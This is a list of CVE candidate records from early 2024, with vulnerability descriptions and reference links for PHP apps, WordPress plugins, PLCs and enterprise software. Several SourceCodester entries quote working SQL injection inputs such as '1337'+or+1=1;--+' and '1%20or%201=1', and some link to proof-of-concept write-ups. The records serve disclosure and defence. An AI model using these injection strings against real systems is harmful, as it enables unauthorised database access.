CVE    2024    1923    Candidate    A vulnerability was found in SourceCodester Simple Student Attendance System 1.0 and classified as critical. Affected by this issue is the function delete_class/delete_student of the file /ajax-api.php of the component List of Classes Page. The manipulation of the argument id with the input 1337'+or+1=1;--+ leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254858 is the identifier assigned to this vulnerability.    MISC:VDB-254858 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254858   |   MISC:VDB-254858 | SourceCodester Simple Student Attendance System List of Classes Page ajax-api.php delete_student sql injection   |   URL:https://vuldb.com/?id.254858   |   MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BSimple%20Student%20Attendance%20System%20using%20PHP%20and%20MySQL%5D%20SQLi%20on%20ajax-api.php%3Faction=delete_class.md   |   URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BSimple%20Student%20Attendance%20System%20using%20PHP%20and%20MySQL%5D%20SQLi%20on%20ajax-api.php%3Faction=delete_class.md    Assigned (20240227)
CVE    2024    1922    Candidate    A vulnerability has been found in SourceCodester Online Job Portal 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /Employer/ManageJob.php of the component Manage Job Page. The manipulation of the argument Qualification/Description leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254857 was assigned to this vulnerability.    MISC:VDB-254857 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254857   |   MISC:VDB-254857 | SourceCodester Online Job Portal Manage Job Page ManageJob.php cross site scripting   |   URL:https://vuldb.com/?id.254857   |   MISC:https://prnt.sc/WD3nof5FsEBv   |   URL:https://prnt.sc/WD3nof5FsEBv   |   MISC:https://prnt.sc/zw3SnPnfpKGu   |   URL:https://prnt.sc/zw3SnPnfpKGu    Assigned (20240227)
CVE    2024    1921    Candidate    A vulnerability, which was classified as critical, was found in osuuu LightPicture up to 1.2.2. Affected is an unknown function of the file /app/controller/Setup.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254856.    MISC:VDB-254856 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254856   |   MISC:VDB-254856 | osuuu LightPicture Setup.php unrestricted upload   |   URL:https://vuldb.com/?id.254856   |   MISC:https://note.zhaoj.in/share/FeCRflSHPLbj   |   URL:https://note.zhaoj.in/share/FeCRflSHPLbj    Assigned (20240227)
CVE    2024    1920    Candidate    A vulnerability, which was classified as critical, has been found in osuuu LightPicture up to 1.2.2. This issue affects the function handle of the file /app/middleware/TokenVerify.php. The manipulation leads to use of hard-coded cryptographic key. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254855.    MISC:VDB-254855 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254855   |   MISC:VDB-254855 | osuuu LightPicture TokenVerify.php handle hard-coded key   |   URL:https://vuldb.com/?id.254855   |   MISC:https://note.zhaoj.in/share/gKyCbSSdJ5fY   |   URL:https://note.zhaoj.in/share/gKyCbSSdJ5fY    Assigned (20240227)
CVE    2024    1919    Candidate    A vulnerability classified as problematic was found in SourceCodester Online Job Portal 1.0. This vulnerability affects unknown code of the file /Employer/ManageWalkin.php of the component Manage Walkin Page. The manipulation of the argument Job Title leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-254854 is the identifier assigned to this vulnerability.    MISC:VDB-254854 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254854   |   MISC:VDB-254854 | SourceCodester Online Job Portal Manage Walkin Page ManageWalkin.php cross site scripting   |   URL:https://vuldb.com/?id.254854   |   MISC:https://prnt.sc/1W0g0F8vv2mw   |   URL:https://prnt.sc/1W0g0F8vv2mw    Assigned (20240227)
CVE    2024    1918    Candidate    A vulnerability has been found in Beijing Baichuo Smart S42 Management Platform up to 20240219 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /useratte/userattestation.php. The manipulation of the argument hidwel leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254839. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254839 | Beijing Baichuo Smart S42 Management Platform userattestation.php unrestricted upload   |   URL:https://vuldb.com/?id.254839   |   MISC:VDB-254839 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254839   |   MISC:https://github.com/Echosssy/CVE/blob/main/%E5%85%B3%E4%BA%8ESmart%20S42%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%83%85%E5%86%B5%E9%80%9A%E6%8A%A5-userattestation.php.docx   |   URL:https://github.com/Echosssy/CVE/blob/main/%E5%85%B3%E4%BA%8ESmart%20S42%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%83%85%E5%86%B5%E9%80%9A%E6%8A%A5-userattestation.php.docx    Assigned (20240227)
CVE    2024    1917    Candidate    Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially crafted packet.    MISC:https://jvn.jp/vu/JVNVU99690199/   |   URL:https://jvn.jp/vu/JVNVU99690199/   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14   |   MISC:https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf   |   URL:https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf    Assigned (20240227)
CVE    2024    1915    Candidate    Incorrect Pointer Scaling vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially crafted packet.    MISC:https://jvn.jp/vu/JVNVU99690199/   |   URL:https://jvn.jp/vu/JVNVU99690199/   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14   |   MISC:https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf   |   URL:https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf    Assigned (20240227)
CVE    2024    1912    Candidate    The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxUpdateFolderPosition function. This makes it possible for unauthenticated attackers to update the folder position of categories as well as update the metadata of other taxonomies via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6ca28c91-f75e-4691-91cf-459cc9da5ad8?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6ca28c91-f75e-4691-91cf-459cc9da5ad8?source=cve    Assigned (20240226)
CVE    2024    1910    Candidate    The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxClearCategory function. This makes it possible for unauthenticated attackers to clear categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b1c2712d-0865-4759-98da-1e11a26f2466?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b1c2712d-0865-4759-98da-1e11a26f2466?source=cve    Assigned (20240226)
CVE    2024    1909    Candidate    The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxRenameCategory function. This makes it possible for unauthenticated attackers to rename categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/58b29729-e9c3-4d57-affd-6142dfa8cc6f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/58b29729-e9c3-4d57-affd-6142dfa8cc6f?source=cve    Assigned (20240226)
CVE    2024    1908    Candidate    An Improper Privilege Management vulnerability was identified in GitHub Enterprise Server that allowed an attacker to use the Enterprise Actions GitHub Connect download token to fetch private repository data. An attacker would require an account on the server instance with non-default settings for GitHub Connect. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.16, 3.9.11, 3.10.8, and 3.11.6. This vulnerability was reported via the GitHub Bug Bounty program.    MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes/#3.8.16   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes/#3.8.16   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes/#3.9.11   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes/#3.9.11   |   MISC:https://https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.8   |   URL:https://https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.8   |   MISC:https://https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.16   |   URL:https://https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.16    Assigned (20240226)
CVE    2024    1907    Candidate    The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxDeleteCategory function. This makes it possible for unauthenticated attackers to delete categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/08c79118-9dad-44fd-b683-7950276d3808?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/08c79118-9dad-44fd-b683-7950276d3808?source=cve    Assigned (20240226)
CVE    2024    1906    Candidate    The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxAddCategory function. This makes it possible for unauthenticated attackers to add categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/78422a30-bdc6-4e7c-a018-c3dc4b4be6a0?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/78422a30-bdc6-4e7c-a018-c3dc4b4be6a0?source=cve    Assigned (20240226)
CVE    2024    1901    Candidate    Denial of service in PAM password rotation during the check-in process in Devolutions Server 2023.3.14.0 allows an authenticated user with specific PAM permissions to make PAM credentials unavailable.    MISC:https://devolutions.net/security/advisories/DEVO-2024-0002   |   URL:https://devolutions.net/security/advisories/DEVO-2024-0002    Assigned (20240226)
CVE    2024    1900    Candidate    Improper session management in the identity provider authentication flow in Devolutions Server 2023.3.14.0 and earlier allows an authenticated user via an identity provider to stay authenticated after his user is disabled or deleted in the identity provider such as Okta or Microsoft O365. The user will stay authenticated until the Devolutions Server token expiration.    MISC:https://devolutions.net/security/advisories/DEVO-2024-0002   |   URL:https://devolutions.net/security/advisories/DEVO-2024-0002    Assigned (20240226)
CVE    2024    1899    Candidate    An issue in the anchors subparser of Showdownjs versions <= 2.1.0 could allow a remote attacker to cause denial of service conditions.    MISC:https://www.tenable.com/security/research/tra-2024-05   |   URL:https://www.tenable.com/security/research/tra-2024-05    Assigned (20240226)
CVE    2024    1898    Candidate    Improper access control in the notification feature in Devolutions Server 2023.3.14.0 and earlier allows a low privileged user to change notifications settings configured by an administrator.    MISC:https://devolutions.net/security/advisories/DEVO-2024-0002   |   URL:https://devolutions.net/security/advisories/DEVO-2024-0002    Assigned (20240226)
CVE    2024    1894    Candidate    The Burst Statistics – Privacy-Friendly Analytics for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'burst_total_pageviews_count' custom meta field in all versions up to, and including, 1.5.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that this exploit only functions if the victim has the 'Show Toolbar when viewing site' option enabled in their profile.    MISC:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/class-frontend.php#L67   |   URL:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/class-frontend.php#L67   |   MISC:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/class-frontend.php#L74   |   URL:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/class-frontend.php#L74   |   MISC:https://plugins.trac.wordpress.org/changeset?old_path=/burst-statistics/tags/1.5.6.1&old=3049793&new_path=/burst-statistics/tags/1.5.7&new=3049793&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=/burst-statistics/tags/1.5.6.1&old=3049793&new_path=/burst-statistics/tags/1.5.7&new=3049793&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/fa587df5-9d96-4cac-ae5d-2a0485a3a789?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/fa587df5-9d96-4cac-ae5d-2a0485a3a789?source=cve    Assigned (20240226)
CVE    2024    1892    Candidate    Parts of the Scrapy API were found to be vulnerable to a ReDoS attack. Handling a malicious response could cause extreme CPU and memory usage during the parsing of its content, due to the use of vulnerable regular expressions for that parsing.    MISC:https://github.com/scrapy/scrapy/commit/479619b340f197a8f24c5db45bc068fb8755f2c5   |   URL:https://github.com/scrapy/scrapy/commit/479619b340f197a8f24c5db45bc068fb8755f2c5   |   MISC:https://huntr.com/bounties/271f94f2-1e05-4616-ac43-41752389e26b   |   URL:https://huntr.com/bounties/271f94f2-1e05-4616-ac43-41752389e26b    Assigned (20240226)
CVE    2024    1890    Candidate    Vulnerability whereby an attacker could send a malicious link to an authenticated operator, which could allow remote attackers to perform a clickjacking attack on Sunny WebBox firmware version 1.6.1 and earlier.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-sma-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-sma-products    Assigned (20240226)
CVE    2024    1889    Candidate    Cross-Site Request Forgery vulnerability in SMA Cluster Controller, affecting version 01.05.01.R. This vulnerability could allow an attacker to send a malicious link to an authenticated user to perform actions with these user permissions on the affected device.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-sma-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-sma-products    Assigned (20240226)
CVE    2024    1888    Candidate    Mattermost fails to check the "invite_guest" permission when inviting guests of other teams to a team, allowing a member with permissions to add other members but not to add guests to add a guest to a team as long as the guest was already a guest in another team of the server.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240226)
CVE    2024    1887    Candidate    Mattermost fails to check if compliance export is enabled when fetching posts of public channels allowing a user that is not a member of the public channel to fetch the posts, which will not be audited in the compliance export.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240226)
CVE    2024    1886    Candidate    This vulnerability allows remote attackers to traverse the directory on the affected webOS of LG Signage.    MISC:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails   |   URL:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails    Assigned (20240226)
CVE    2024    1885    Candidate    This vulnerability allows remote attackers to execute arbitrary code on the affected webOS of LG Signage.    MISC:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails   |   URL:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails    Assigned (20240226)
CVE    2024    1884    Candidate    This is a Server-Side Request Forgery (SSRF) vulnerability in the PaperCut NG/MF server-side module that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.    MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024   |   URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024    Assigned (20240226)
CVE    2024    1883    Candidate    This is a reflected cross site scripting vulnerability in the PaperCut NG/MF application server. An attacker can exploit this weakness by crafting a malicious URL that contains a script. When an unsuspecting user clicks on this malicious link, it could potentially lead to limited loss of confidentiality, integrity or availability.    MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024   |   URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024    Assigned (20240226)
CVE    2024    1882    Candidate    This vulnerability allows an already authenticated admin user to create a malicious payload that could be leveraged for remote code execution on the server hosting the PaperCut NG/MF application server.    MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024   |   URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024    Assigned (20240226)
CVE    2024    1878    Candidate    A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /myprofile.php. The manipulation of the argument id with the input 1%20or%201=1 leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254726 is the identifier assigned to this vulnerability.    MISC:VDB-254726 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254726   |   MISC:VDB-254726 | SourceCodester Employee Management System myprofile.php sql injection   |   URL:https://vuldb.com/?id.254726   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/IDOR%20Employee%20Profile.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/IDOR%20Employee%20Profile.md    Assigned (20240225)
CVE    2024    1877    Candidate    A vulnerability was found in SourceCodester Employee Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /cancel.php. The manipulation of the argument id with the input 1%20or%201=1 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254725 was assigned to this vulnerability.    MISC:VDB-254725 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254725   |   MISC:VDB-254725 | SourceCodester Employee Management System cancel.php sql injection   |   URL:https://vuldb.com/?id.254725   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/Employee%20Leave%20Cancel%20SQL%20Injection.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/Employee%20Leave%20Cancel%20SQL%20Injection.md    Assigned (20240225)
CVE    2024    1876    Candidate    A vulnerability was found in SourceCodester Employee Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /psubmit.php. The manipulation of the argument pid with the input '+or+1%3d1%23 leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254724.    MISC:VDB-254724 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254724   |   MISC:VDB-254724 | SourceCodester Employee Management System psubmit.php sql injection   |   URL:https://vuldb.com/?id.254724   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/Employee%20Project%20SQL%20Injection%20Update.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/Employee%20Project%20SQL%20Injection%20Update.md    Assigned (20240225)
CVE    2024    1875    Candidate    A vulnerability was found in SourceCodester Complaint Management System 1.0 and classified as critical. This issue affects some unknown processing of the file users/register-complaint.php of the component Lodge Complaint Section. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254723.    MISC:VDB-254723 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254723   |   MISC:VDB-254723 | SourceCodester Complaint Management System Lodge Complaint Section register-complaint.php unrestricted upload   |   URL:https://vuldb.com/?id.254723   |   MISC:https://toradah.notion.site/Remote-Code-Execution-RCE-via-Unrestricted-File-Upload-6ed7ae9c833c4d8baaae7d64ae0c4a47?pvs=4   |   URL:https://toradah.notion.site/Remote-Code-Execution-RCE-via-Unrestricted-File-Upload-6ed7ae9c833c4d8baaae7d64ae0c4a47?pvs=4    Assigned (20240225)
CVE    2024    1871    Candidate    A vulnerability, which was classified as problematic, was found in SourceCodester Employee Management System 1.0. Affected is an unknown function of the file /process/assignp.php of the component Project Assignment Report. The manipulation of the argument pname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254694 is the identifier assigned to this vulnerability.    MISC:VDB-254694 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254694   |   MISC:VDB-254694 | SourceCodester Employee Management System Project Assignment Report assignp.php cross site scripting   |   URL:https://vuldb.com/?id.254694   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/XSS%20Vulnerability%20in%20Project%20Assignment%20Report.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/XSS%20Vulnerability%20in%20Project%20Assignment%20Report.md    Assigned (20240224)
CVE    2024    1870    Candidate    The Colibri Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the callActivateLicenseEndpoint function in all versions up to, and including, 1.0.260. This makes it possible for authenticated attackers, with subscriber access or higher, to update the license key.    MISC:https://plugins.trac.wordpress.org/browser/colibri-page-builder/trunk/src/License/ActivationForm.php#L356   |   URL:https://plugins.trac.wordpress.org/browser/colibri-page-builder/trunk/src/License/ActivationForm.php#L356   |   MISC:https://plugins.trac.wordpress.org/changeset/3045582/colibri-page-builder/trunk/src/License/ActivationForm.php?contextall=1&old=2888093&old_path=%2Fcolibri-page-builder%2Ftrunk%2Fsrc%2FLicense%2FActivationForm.php   |   URL:https://plugins.trac.wordpress.org/changeset/3045582/colibri-page-builder/trunk/src/License/ActivationForm.php?contextall=1&old=2888093&old_path=%2Fcolibri-page-builder%2Ftrunk%2Fsrc%2FLicense%2FActivationForm.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/130637ce-d70a-4831-8b88-a2a6e8a95c42?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/130637ce-d70a-4831-8b88-a2a6e8a95c42?source=cve    Assigned (20240223)
CVE    2024    1869    Candidate    Certain HP DesignJet print products are potentially vulnerable to information disclosure related to accessing memory out-of-bounds when using the general-purpose gateway (GGW) over port 9220.    MISC:https://support.hp.com/us-en/document/ish_10235960-10236033-16/hpsbpi03920   |   URL:https://support.hp.com/us-en/document/ish_10235960-10236033-16/hpsbpi03920    Assigned (20240223)
CVE    2024    1866    Candidate    ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-2813. Reason: This candidate is a duplicate of CVE-2023-2813. Notes: All CVE users should reference CVE-2023-2813 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.        Assigned (20240223)
CVE    2024    1862    Candidate    The WooCommerce Add to Cart Custom Redirect plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'wcr_dismiss_admin_notice' function in all versions up to, and including, 1.2.13. This makes it possible for authenticated attackers, with contributor access and above, to update the values of arbitrary site options to 'dismissed'.    MISC:https://plugins.trac.wordpress.org/browser/woocommerce-add-to-cart-custom-redirect/tags/1.2.13/woocommerce-custom-redirect.php#L204   |   URL:https://plugins.trac.wordpress.org/browser/woocommerce-add-to-cart-custom-redirect/tags/1.2.13/woocommerce-custom-redirect.php#L204   |   MISC:https://plugins.trac.wordpress.org/changeset?old_path=/woocommerce-add-to-cart-custom-redirect/tags/1.2.13&old=3047408&new_path=/woocommerce-add-to-cart-custom-redirect/tags/1.2.14&new=3047408&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=/woocommerce-add-to-cart-custom-redirect/tags/1.2.13&old=3047408&new_path=/woocommerce-add-to-cart-custom-redirect/tags/1.2.14&new=3047408&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/36c6a116-37cc-4ade-b601-5f9d6aaf9217?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/36c6a116-37cc-4ade-b601-5f9d6aaf9217?source=cve    Assigned (20240223)
CVE    2024    1861    Candidate    The Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the antihacker_truncate_scan_table() function in all versions up to, and including, 4.52. This makes it possible for authenticated attackers, with subscriber-level access and above, to truncate the scan table.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040447%40antihacker&new=3040447%40antihacker&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040447%40antihacker&new=3040447%40antihacker&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b80c8888-e8d6-4458-ae93-8e4182060590?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b80c8888-e8d6-4458-ae93-8e4182060590?source=cve    Assigned (20240223)
CVE    2024    1860    Candidate    The Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the antihacker_add_whitelist() function in all versions up to, and including, 4.51. This makes it possible for unauthenticated attackers to add their IP Address to the whitelist, circumventing protection.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040434%40antihacker&new=3040434%40antihacker&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040434%40antihacker&new=3040434%40antihacker&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3d365284-73ac-4730-a83d-9202677cf161?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3d365284-73ac-4730-a83d-9202677cf161?source=cve    Assigned (20240223)
CVE    2024    1859    Candidate    The Slider Responsive Slideshow – Image slider, Gallery slideshow plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8 via deserialization of untrusted input to the awl_slider_responsive_shortcode function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3041884%40slider-responsive-slideshow&new=3041884%40slider-responsive-slideshow&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3041884%40slider-responsive-slideshow&new=3041884%40slider-responsive-slideshow&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d35266cd-41e6-4358-afaa-bc008962f2e1?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d35266cd-41e6-4358-afaa-bc008962f2e1?source=cve    Assigned (20240223)
